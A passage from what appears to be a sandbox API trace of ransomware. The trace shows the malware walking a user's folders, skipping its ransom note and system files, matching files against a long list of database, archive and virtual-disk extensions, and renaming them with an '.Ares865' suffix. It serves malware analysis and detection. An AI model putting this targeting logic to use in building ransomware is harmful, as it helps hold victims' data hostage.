Size=0x6c) returned 0x2d2f68 [0092.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.018] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.018] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.018] CloseHandle (hObject=0x15c) returned 1 [0092.018] CloseHandle (hObject=0x118) returned 1 [0092.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.020] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.020] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d09faa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.020] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.020] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aa6b2c0, ftCreationTime.dwHighDateTime=0x1d4c78a, ftLastAccessTime.dwLowDateTime=0x8e0483b0, ftLastAccessTime.dwHighDateTime=0x1d4c679, ftLastWriteTime.dwLowDateTime=0x8e0483b0, ftLastWriteTime.dwHighDateTime=0x1d4c679, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KwXMMyhtOH37.avi", cAlternateFileName="KWXMMY~1.AVI")) returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="aoldtz.exe") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2=".") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="..") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="windows") returned -1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="bootmgr") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="temp") returned -1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="pagefile.sys") returned -1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="boot") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="ids.txt") returned 1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="ntuser.dat") returned -1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="perflogs") returned -1 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2="MSBuild") returned -1 [0092.020] lstrlenW (lpString="KwXMMyhtOH37.avi") returned 16 [0092.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\5757_10vS5HYp.mkv") returned 91 [0092.020] lstrcpyW (in: lpString1=0x2cce494, lpString2="KwXMMyhtOH37.avi" | out: lpString1="KwXMMyhtOH37.avi") returned="KwXMMyhtOH37.avi" [0092.020] lstrlenW (lpString="KwXMMyhtOH37.avi") returned 16 [0092.020] lstrlenW (lpString="Ares865") returned 7 [0092.020] lstrcmpiW (lpString1="H37.avi", lpString2="Ares865") returned 1 [0092.020] lstrlenW (lpString=".dll") returned 4 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2=".dll") returned 1 [0092.020] lstrlenW (lpString=".lnk") returned 4 [0092.020] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2=".lnk") returned 1 [0092.021] lstrlenW (lpString=".ini") returned 4 [0092.021] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2=".ini") returned 1 [0092.021] lstrlenW (lpString=".sys") returned 4 [0092.021] lstrcmpiW (lpString1="KwXMMyhtOH37.avi", lpString2=".sys") returned 1 [0092.021] lstrlenW (lpString="KwXMMyhtOH37.avi") returned 16 [0092.021] lstrlenW (lpString="bak") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="bak") returned -1 [0092.021] lstrlenW (lpString="ba_") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="ba_") returned -1 [0092.021] lstrlenW (lpString="dbb") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="dbb") returned -1 [0092.021] lstrlenW (lpString="vmdk") returned 4 [0092.021] lstrcmpiW (lpString1=".avi", lpString2="vmdk") returned -1 [0092.021] lstrlenW (lpString="rar") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="rar") returned -1 [0092.021] lstrlenW (lpString="zip") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="zip") returned -1 [0092.021] lstrlenW (lpString="tgz") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="tgz") returned -1 [0092.021] lstrlenW (lpString="vbox") returned 4 [0092.021] lstrcmpiW (lpString1=".avi", lpString2="vbox") returned -1 [0092.021] lstrlenW (lpString="vdi") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="vdi") returned -1 [0092.021] lstrlenW (lpString="vhd") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="vhd") returned -1 [0092.021] lstrlenW (lpString="vhdx") returned 4 [0092.021] lstrcmpiW (lpString1=".avi", lpString2="vhdx") returned -1 [0092.021] lstrlenW (lpString="avhd") returned 4 [0092.021] lstrcmpiW (lpString1=".avi", lpString2="avhd") returned -1 [0092.021] lstrlenW (lpString="db") returned 2 [0092.021] lstrcmpiW (lpString1="vi", lpString2="db") returned 1 [0092.021] lstrlenW (lpString="db2") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="db2") returned -1 [0092.021] lstrlenW (lpString="db3") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="db3") returned -1 [0092.021] lstrlenW (lpString="dbf") returned 3 [0092.021] lstrcmpiW (lpString1="avi", lpString2="dbf") returned -1 [0092.021] lstrlenW (lpString="mdf") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="mdf") returned -1 [0092.022] lstrlenW (lpString="mdb") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="mdb") returned -1 [0092.022] lstrlenW (lpString="sql") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="sql") returned -1 [0092.022] lstrlenW (lpString="sqlite") returned 6 [0092.022] lstrcmpiW (lpString1="37.avi", lpString2="sqlite") returned -1 [0092.022] lstrlenW (lpString="sqlite3") returned 7 [0092.022] lstrcmpiW (lpString1="H37.avi", lpString2="sqlite3") returned -1 [0092.022] lstrlenW (lpString="sqlitedb") returned 8 [0092.022] lstrcmpiW (lpString1="OH37.avi", lpString2="sqlitedb") returned -1 [0092.022] lstrlenW (lpString="xml") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="xml") returned -1 [0092.022] lstrlenW (lpString="$er") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="$er") returned 1 [0092.022] lstrlenW (lpString="4dd") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="4dd") returned 1 [0092.022] lstrlenW (lpString="4dl") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="4dl") returned 1 [0092.022] lstrlenW (lpString="^^^") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="^^^") returned 1 [0092.022] lstrlenW (lpString="abs") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="abs") returned 1 [0092.022] lstrlenW (lpString="abx") returned 3 [0092.022] lstrcmpiW (lpString1="avi", lpString2="abx") returned 1 [0092.022] lstrlenW (lpString="accdb") returned 5 [0092.022] lstrcmpiW (lpString1="7.avi", lpString2="accdb") returned -1 [0092.022] lstrlenW (lpString="accdc") returned 5 [0092.022] lstrcmpiW (lpString1="7.avi", lpString2="accdc") returned -1 [0092.022] lstrlenW (lpString="accde") returned 5 [0092.022] lstrcmpiW (lpString1="7.avi", lpString2="accde") returned -1 [0092.022] lstrlenW (lpString="accdr") returned 5 [0092.022] lstrcmpiW (lpString1="7.avi", lpString2="accdr") returned -1 [0092.022] lstrlenW (lpString="accdt") returned 5 [0092.022] lstrcmpiW (lpString1="7.avi", lpString2="accdt") returned -1 [0092.022] lstrlenW (lpString="accdw") returned 5 [0092.022] lstrcmpiW (lpString1="7.avi", lpString2="accdw") returned -1 [0092.023] lstrlenW (lpString="accft") returned 5 [0092.023] lstrcmpiW (lpString1="7.avi", lpString2="accft") returned -1 [0092.023] lstrlenW (lpString="adb") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0092.023] lstrlenW (lpString="adb") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0092.023] lstrlenW (lpString="ade") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="ade") returned 1 [0092.023] lstrlenW (lpString="adf") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="adf") returned 1 [0092.023] lstrlenW (lpString="adn") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="adn") returned 1 [0092.023] lstrlenW (lpString="adp") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="adp") returned 1 [0092.023] lstrlenW (lpString="alf") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="alf") returned 1 [0092.023] lstrlenW (lpString="ask") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="ask") returned 1 [0092.023] lstrlenW (lpString="btr") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="btr") returned -1 [0092.023] lstrlenW (lpString="cat") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="cat") returned -1 [0092.023] lstrlenW (lpString="cdb") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="cdb") returned -1 [0092.023] lstrlenW (lpString="ckp") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="ckp") returned -1 [0092.023] lstrlenW (lpString="cma") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="cma") returned -1 [0092.023] lstrlenW (lpString="cpd") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="cpd") returned -1 [0092.023] lstrlenW (lpString="dacpac") returned 6 [0092.023] lstrcmpiW (lpString1="37.avi", lpString2="dacpac") returned -1 [0092.023] lstrlenW (lpString="dad") returned 3 [0092.023] lstrcmpiW (lpString1="avi", lpString2="dad") returned -1 [0092.023] lstrlenW (lpString="dadiagrams") returned 10 [0092.023] lstrcmpiW (lpString1="htOH37.avi", lpString2="dadiagrams") returned 1 [0092.023] lstrlenW (lpString="daschema") returned 8 [0092.023] lstrcmpiW (lpString1="OH37.avi", lpString2="daschema") returned 1 [0092.024] lstrlenW (lpString="db-journal") returned 10 [0092.024] lstrcmpiW (lpString1="htOH37.avi", lpString2="db-journal") returned 1 [0092.024] lstrlenW (lpString="db-shm") returned 6 [0092.024] lstrcmpiW (lpString1="37.avi", lpString2="db-shm") returned -1 [0092.024] lstrlenW (lpString="db-wal") returned 6 [0092.024] lstrcmpiW (lpString1="37.avi", lpString2="db-wal") returned -1 [0092.024] lstrlenW (lpString="dbc") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dbc") returned -1 [0092.024] lstrlenW (lpString="dbs") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dbs") returned -1 [0092.024] lstrlenW (lpString="dbt") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dbt") returned -1 [0092.024] lstrlenW (lpString="dbv") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dbv") returned -1 [0092.024] lstrlenW (lpString="dbx") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dbx") returned -1 [0092.024] lstrlenW (lpString="dcb") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dcb") returned -1 [0092.024] lstrlenW (lpString="dct") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dct") returned -1 [0092.024] lstrlenW (lpString="dcx") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dcx") returned -1 [0092.024] lstrlenW (lpString="ddl") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="ddl") returned -1 [0092.024] lstrlenW (lpString="dlis") returned 4 [0092.024] lstrcmpiW (lpString1=".avi", lpString2="dlis") returned -1 [0092.024] lstrlenW (lpString="dp1") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dp1") returned -1 [0092.024] lstrlenW (lpString="dqy") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dqy") returned -1 [0092.024] lstrlenW (lpString="dsk") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dsk") returned -1 [0092.024] lstrlenW (lpString="dsn") returned 3 [0092.024] lstrcmpiW (lpString1="avi", lpString2="dsn") returned -1 [0092.024] lstrlenW (lpString="dtsx") returned 4 [0092.024] lstrcmpiW (lpString1=".avi", lpString2="dtsx") returned -1 [0092.024] lstrlenW (lpString="dxl") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="dxl") returned -1 [0092.025] lstrlenW (lpString="eco") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="eco") returned -1 [0092.025] lstrlenW (lpString="ecx") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="ecx") returned -1 [0092.025] lstrlenW (lpString="edb") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="edb") returned -1 [0092.025] lstrlenW (lpString="epim") returned 4 [0092.025] lstrcmpiW (lpString1=".avi", lpString2="epim") returned -1 [0092.025] lstrlenW (lpString="fcd") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fcd") returned -1 [0092.025] lstrlenW (lpString="fdb") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fdb") returned -1 [0092.025] lstrlenW (lpString="fic") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fic") returned -1 [0092.025] lstrlenW (lpString="flexolibrary") returned 12 [0092.025] lstrcmpiW (lpString1="MyhtOH37.avi", lpString2="flexolibrary") returned 1 [0092.025] lstrlenW (lpString="fm5") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fm5") returned -1 [0092.025] lstrlenW (lpString="fmp") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fmp") returned -1 [0092.025] lstrlenW (lpString="fmp12") returned 5 [0092.025] lstrcmpiW (lpString1="7.avi", lpString2="fmp12") returned -1 [0092.025] lstrlenW (lpString="fmpsl") returned 5 [0092.025] lstrcmpiW (lpString1="7.avi", lpString2="fmpsl") returned -1 [0092.025] lstrlenW (lpString="fol") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fol") returned -1 [0092.025] lstrlenW (lpString="fp3") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fp3") returned -1 [0092.025] lstrlenW (lpString="fp4") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fp4") returned -1 [0092.025] lstrlenW (lpString="fp5") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fp5") returned -1 [0092.025] lstrlenW (lpString="fp7") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fp7") returned -1 [0092.025] lstrlenW (lpString="fpt") returned 3 [0092.025] lstrcmpiW (lpString1="avi", lpString2="fpt") returned -1 [0092.025] lstrlenW (lpString="frm") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="frm") returned -1 [0092.026] lstrlenW (lpString="gdb") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0092.026] lstrlenW (lpString="gdb") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0092.026] lstrlenW (lpString="grdb") returned 4 [0092.026] lstrcmpiW (lpString1=".avi", lpString2="grdb") returned -1 [0092.026] lstrlenW (lpString="gwi") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="gwi") returned -1 [0092.026] lstrlenW (lpString="hdb") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="hdb") returned -1 [0092.026] lstrlenW (lpString="his") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="his") returned -1 [0092.026] lstrlenW (lpString="ib") returned 2 [0092.026] lstrcmpiW (lpString1="vi", lpString2="ib") returned 1 [0092.026] lstrlenW (lpString="idb") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="idb") returned -1 [0092.026] lstrlenW (lpString="ihx") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="ihx") returned -1 [0092.026] lstrlenW (lpString="itdb") returned 4 [0092.026] lstrcmpiW (lpString1=".avi", lpString2="itdb") returned -1 [0092.026] lstrlenW (lpString="itw") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="itw") returned -1 [0092.026] lstrlenW (lpString="jet") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="jet") returned -1 [0092.026] lstrlenW (lpString="jtx") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="jtx") returned -1 [0092.026] lstrlenW (lpString="kdb") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="kdb") returned -1 [0092.026] lstrlenW (lpString="kexi") returned 4 [0092.026] lstrcmpiW (lpString1=".avi", lpString2="kexi") returned -1 [0092.026] lstrlenW (lpString="kexic") returned 5 [0092.026] lstrcmpiW (lpString1="7.avi", lpString2="kexic") returned -1 [0092.026] lstrlenW (lpString="kexis") returned 5 [0092.026] lstrcmpiW (lpString1="7.avi", lpString2="kexis") returned -1 [0092.026] lstrlenW (lpString="lgc") returned 3 [0092.026] lstrcmpiW (lpString1="avi", lpString2="lgc") returned -1 [0092.027] lstrlenW (lpString="lwx") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="lwx") returned -1 [0092.027] lstrlenW (lpString="maf") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="maf") returned -1 [0092.027] lstrlenW (lpString="maq") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="maq") returned -1 [0092.027] lstrlenW (lpString="mar") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mar") returned -1 [0092.027] lstrlenW (lpString="marshal") returned 7 [0092.027] lstrcmpiW (lpString1="H37.avi", lpString2="marshal") returned -1 [0092.027] lstrlenW (lpString="mas") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mas") returned -1 [0092.027] lstrlenW (lpString="mav") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mav") returned -1 [0092.027] lstrlenW (lpString="maw") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="maw") returned -1 [0092.027] lstrlenW (lpString="mdbhtml") returned 7 [0092.027] lstrcmpiW (lpString1="H37.avi", lpString2="mdbhtml") returned -1 [0092.027] lstrlenW (lpString="mdn") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mdn") returned -1 [0092.027] lstrlenW (lpString="mdt") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mdt") returned -1 [0092.027] lstrlenW (lpString="mfd") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mfd") returned -1 [0092.027] lstrlenW (lpString="mpd") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mpd") returned -1 [0092.027] lstrlenW (lpString="mrg") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mrg") returned -1 [0092.027] lstrlenW (lpString="mud") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mud") returned -1 [0092.027] lstrlenW (lpString="mwb") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="mwb") returned -1 [0092.027] lstrlenW (lpString="myd") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="myd") returned -1 [0092.027] lstrlenW (lpString="ndf") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="ndf") returned -1 [0092.027] lstrlenW (lpString="nnt") returned 3 [0092.027] lstrcmpiW (lpString1="avi", lpString2="nnt") returned -1 [0092.028] lstrlenW (lpString="nrmlib") returned 6 [0092.028] lstrcmpiW (lpString1="37.avi", lpString2="nrmlib") returned -1 [0092.028] lstrlenW (lpString="ns2") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="ns2") returned -1 [0092.028] lstrlenW (lpString="ns3") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="ns3") returned -1 [0092.028] lstrlenW (lpString="ns4") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="ns4") returned -1 [0092.028] lstrlenW (lpString="nsf") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="nsf") returned -1 [0092.028] lstrlenW (lpString="nv") returned 2 [0092.028] lstrcmpiW (lpString1="vi", lpString2="nv") returned 1 [0092.028] lstrlenW (lpString="nv2") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="nv2") returned -1 [0092.028] lstrlenW (lpString="nwdb") returned 4 [0092.028] lstrcmpiW (lpString1=".avi", lpString2="nwdb") returned -1 [0092.028] lstrlenW (lpString="nyf") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="nyf") returned -1 [0092.028] lstrlenW (lpString="odb") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0092.028] lstrlenW (lpString="odb") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0092.028] lstrlenW (lpString="oqy") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="oqy") returned -1 [0092.028] lstrlenW (lpString="ora") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="ora") returned -1 [0092.028] lstrlenW (lpString="orx") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="orx") returned -1 [0092.028] lstrlenW (lpString="owc") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="owc") returned -1 [0092.028] lstrlenW (lpString="p96") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="p96") returned -1 [0092.028] lstrlenW (lpString="p97") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="p97") returned -1 [0092.028] lstrlenW (lpString="pan") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="pan") returned -1 [0092.028] lstrlenW (lpString="pdb") returned 3 [0092.028] lstrcmpiW (lpString1="avi", lpString2="pdb") returned -1 [0092.029] lstrlenW (lpString="pdm") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="pdm") returned -1 [0092.029] lstrlenW (lpString="pnz") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="pnz") returned -1 [0092.029] lstrlenW (lpString="qry") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="qry") returned -1 [0092.029] lstrlenW (lpString="qvd") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="qvd") returned -1 [0092.029] lstrlenW (lpString="rbf") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="rbf") returned -1 [0092.029] lstrlenW (lpString="rctd") returned 4 [0092.029] lstrcmpiW (lpString1=".avi", lpString2="rctd") returned -1 [0092.029] lstrlenW (lpString="rod") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="rod") returned -1 [0092.029] lstrlenW (lpString="rodx") returned 4 [0092.029] lstrcmpiW (lpString1=".avi", lpString2="rodx") returned -1 [0092.029] lstrlenW (lpString="rpd") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="rpd") returned -1 [0092.029] lstrlenW (lpString="rsd") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="rsd") returned -1 [0092.029] lstrlenW (lpString="sas7bdat") returned 8 [0092.029] lstrcmpiW (lpString1="OH37.avi", lpString2="sas7bdat") returned -1 [0092.029] lstrlenW (lpString="sbf") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="sbf") returned -1 [0092.029] lstrlenW (lpString="scx") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="scx") returned -1 [0092.029] lstrlenW (lpString="sdb") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="sdb") returned -1 [0092.029] lstrlenW (lpString="sdc") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="sdc") returned -1 [0092.029] lstrlenW (lpString="sdf") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="sdf") returned -1 [0092.029] lstrlenW (lpString="sis") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="sis") returned -1 [0092.029] lstrlenW (lpString="spq") returned 3 [0092.029] lstrcmpiW (lpString1="avi", lpString2="spq") returned -1 [0092.029] lstrlenW (lpString="te") returned 2 [0092.030] lstrcmpiW (lpString1="vi", lpString2="te") returned 1 [0092.030] lstrlenW (lpString="teacher") returned 7 [0092.030] lstrcmpiW (lpString1="H37.avi", lpString2="teacher") returned -1 [0092.030] lstrlenW (lpString="tmd") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="tmd") returned -1 [0092.030] lstrlenW (lpString="tps") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="tps") returned -1 [0092.030] lstrlenW (lpString="trc") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0092.030] lstrlenW (lpString="trc") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0092.030] lstrlenW (lpString="trm") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="trm") returned -1 [0092.030] lstrlenW (lpString="udb") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="udb") returned -1 [0092.030] lstrlenW (lpString="udl") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="udl") returned -1 [0092.030] lstrlenW (lpString="usr") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="usr") returned -1 [0092.030] lstrlenW (lpString="v12") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="v12") returned -1 [0092.030] lstrlenW (lpString="vis") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="vis") returned -1 [0092.030] lstrlenW (lpString="vpd") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="vpd") returned -1 [0092.030] lstrlenW (lpString="vvv") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="vvv") returned -1 [0092.030] lstrlenW (lpString="wdb") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="wdb") returned -1 [0092.030] lstrlenW (lpString="wmdb") returned 4 [0092.030] lstrcmpiW (lpString1=".avi", lpString2="wmdb") returned -1 [0092.030] lstrlenW (lpString="wrk") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="wrk") returned -1 [0092.030] lstrlenW (lpString="xdb") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="xdb") returned -1 [0092.030] lstrlenW (lpString="xld") returned 3 [0092.030] lstrcmpiW (lpString1="avi", lpString2="xld") returned -1 [0092.030] lstrlenW (lpString="xmlff") returned 5 [0092.031] lstrcmpiW (lpString1="7.avi", lpString2="xmlff") returned -1 [0092.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\KwXMMyhtOH37.avi.Ares865") returned 98 [0092.031] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\anDCO4sGwz\\KwXMMyhtOH37.avi" (normalized: "c:\\users\\5p5nrgjn0js 